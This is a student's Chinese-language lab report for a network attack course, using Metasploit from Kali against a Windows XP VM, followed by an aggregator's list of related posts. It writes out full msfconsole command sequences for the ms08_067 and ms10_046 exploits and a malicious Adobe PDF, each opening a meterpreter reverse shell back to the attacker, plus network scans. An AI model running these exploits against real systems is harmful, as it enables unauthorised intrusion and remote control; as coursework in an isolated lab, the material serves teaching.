2018-2019 2 20165210 《网络对抗技术》Exp5 MSF基础
2018-2019 2 20165210 《网络对抗技术》Exp5 MSF基础
实验内容:
- 一个主动攻击实践,如ms08_067(成功);
- 一个针对浏览器的攻击,如ms10_046(成功);
- 一个针对客户端的攻击,如Adobe(成功);
- 成功应用任何一个辅助模ipidseq(唯一)arp_sweep(成功)。
实验过程:
一、一个主动攻击实践,ms08_067。
靶机: windows XP SP3(English)(192.168.16.145)
攻击机:kali(192.168.16.143)
- 输入msfconsole进入控制台,输入search ms08_067指令查询一下针对该漏洞可以运用的攻击模块,我们可以看到在攻击模块中确实存在这样一个漏洞
exploit/windows/smb/ms08_067_netapi
- 我们就利用这个漏洞来进行攻击,输入
use exploit/windows/smb/ms08_067_netapi
- 输入
show payloads
来查看一下,用什么样的payload来攻击
- 输入
set payload generic/meterpreter_reverse_tcp
来设置相关参数。
- 我们可以输入show options来查看哪些参数需要设置
- 使用set LHOST 192.168.16.143和set LPORT 5210设置本机地址和端口,使用set RHOST 192.168.16.145设置耙机地址
- 接着使用exploit指令开始攻击
- 发现攻击成功输入dir显示所有文件
二、一个针对浏览器的攻击,ms10_046。
靶机: windows XP SP3(English)(192.168.16.145)
攻击机:kali(192.168.16.143)
- 输入
search ms10_046 //查询该漏洞的路径
- 输入
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show payloads//漏洞相应的攻击载荷
- 输入
set payload windows/meterpreter/reverse_tcp//设置攻击载荷的参数
set LHOST 192.168.16.143
set SRVHOST 192.168.16.143
set RHOST 192.168.16.145
exploit
- 出现了一个URL链接入口http://192.168.16.143:80/,如图所示。
- 在靶机中打开这个链接,弹出两个文件,打开任意一个文件。
- 发现攻击机已经建立会话,输入sessions,输入
sessions -i 1
,打开session,成功
一个针对客户端的攻击,Adobe。
靶机: windows XP SP3(English)(192.168.16.145)
攻击机:kali(192.168.16.143)
- 进入msfconsole
- 输入
search adobe//查找与adobe有关的漏洞
- 输入
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.154.152
set LPORT 5210
set FILENAME 20165210666.pdf
exploit
- 在图中所显示的路径找到文件,也可以在终端输入
cp /root/.msf4/local/20165210666.pdf ~
- 将生成的文件20165210.pdf复制到靶机中。
- 在攻击机中回到初始界面,开始监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.16.143
set LPORT 5210
exploit
- 成功
四、成功应用任何一个辅助模块(ipidseq唯一)(arp_sweep):
我们可以使用命令msf > show auxiliary查看所有的辅助模块:
- ipidseq唯一
- 功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
- 先search ipidseq后选择相应模块,查看需要设置的参数
- 设置相应的参数
- exploit,扫描成功
- arp_sweep
- arp_sweep使用ARP请求枚举本地局域网络中的所有活跃主机进行扫描
- 输入
use auxiliary/scanner/discovery/arp_sweep
- 进入模块设置参数run扫描
基础问题回答
- 用自己的话解释什么是exploit,payload,encode
exploit既可以看成是运载恶意代码的载体,也可以理解成利用漏洞进行攻击的通道;payload是攻击的具体武器,如后门等;encode用来编码,用于伪装。
实验中遇到的问题
- 在主动攻击实践中,我测试了许多靶机,比如win7,win2008,winxp pattacker。都失败了,只有这个winxp sp3 英文版成功了。
- 在进行一个针对客户端的攻击,Adobe,我发现创建的文件按那个目录根本找不到,只有将其用命令行拷到主文件上。
- 端口号是必须设置的吗?我看博客中有些同学设置了有些没设置。
实验的感受和体会
本次实验做了一天一夜,尤其是在这个虚拟机花费了很多的时间,最后才发现winxp sp3英文版的可以攻击,还有就是学会了MSF工具的一些常用指令,了解了它的六个模块的用法,掌握了如何在/usr/share/metasploit-framework/modules/exploits/路径下找到相应操作系统的相关漏洞,学会了运用一些辅助模块。
离实战还缺些什么技术或步骤
怎么才能安稳的把后门文件放到靶机中,不被发现,怎么解决库的更新。
2018-2019 2 20165210 《网络对抗技术》Exp5 MSF基础的更多相关文章
- 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础
2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155232《网络对抗》Exp5 MSF基础应用
20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...
- 20155302《网络对抗》Exp5 MSF基础应用
20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...
- 20155323刘威良《网络对抗》Exp5 MSF基础应用
20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...
- 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用
20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验 (首用) 渗透实验三:Adobe ...
- 20145215《网络对抗》Exp5 MSF基础应用
20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...
- 20145208 蔡野 《网络对抗》Exp5 MSF基础应用
20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...
- 20145311王亦徐 《网络对抗技术》 MSF基础应用
20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...
- 20145325张梓靖 《网络对抗技术》 MSF基础应用
20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...
随机推荐
- 用74HC165读8个按键状态
源:用74HC165读8个按键状态 源:74LV165与74HC595 使用 74LV165说明: 74LV165是8位并行负载或串行输入移位寄存器,末级提供互补串行输出(Q7和Q7).并行负载(PL ...
- Linux文件系统学习(一)之相关概念⭐⭐⭐
“一切皆是文件”是 Unix/Linux 的基本哲学之一.不仅普通的文件,目录.字符设备.块设备.套接字等在 Unix/Linux 中都是以文件被对待:它们虽然类型不同,但是对其提供的却是同一套操作界 ...
- redis命令的使用
批量删除特定前缀的keys redis-cli KEYS "prefix:*" | xargs redis-cli DEL 返回list的长度 > LPUSH test &q ...
- [BZOJ3124]直径
Description 小Q最近学习了一些图论知识.根据课本,有如下定义.树:无回路且连通的无向图,每条边都有正整数的权值来表示其长度.如果一棵树有N个节点,可以证明其有且仅有N-1 条边. 路径:一 ...
- SSH免密码登录Linux
如果两台linux之间交互频繁,但是每次交互如果都需要输入密码,就会很麻烦,通过配置SSH就可以解决这一问题 下面就说下配置流程(下面流程在不同机器上全部操作一边) 1)cd ~到这个目录中 2)ss ...
- 【GAN】GAN的原理及推导
把GAN的论文看完了, 也确实蛮厉害的懒得写笔记了,转一些较好的笔记,前面先贴一些 原论文里推理部分,进行备忘. GAN的解释 算法流程 GAN的理论推理 转自:https://zhuanlan.zh ...
- [笔记整理]SQL Server 索引碎片 和 重建索引
铺垫知识点: 数据库存储本身是无序的,建立了聚集索引,会按照聚集索引物理顺序存入硬盘.既键值的逻辑顺序决定了表中相应行的物理顺序 多数情况下,数据库读取频率远高于写入频率,索引的存在 为了读取速度牺牲 ...
- Row_Number() over( PARTITION By cno ...)
转自:https://blog.csdn.net/qq_25237107/article/details/644429691.在 MSSQL,oracle 有partition by 的用法creat ...
- PHP中用下划线开头的含义
命名的规则 加一个为私有的 加两个一般都是系统默认的,系统预定义的,即所谓:=====================“魔术方法”与“魔术常量”=====================★PHP起止为 ...
- pwm计时器
1 PWM timer定时器与(watchdog差不多)2 5个16位的定时器,独立的,其中,NO PIN 没有输出.16表示ffff,和ADC中10表示3FF一样.而寄存器都是32位.(以后6410 ...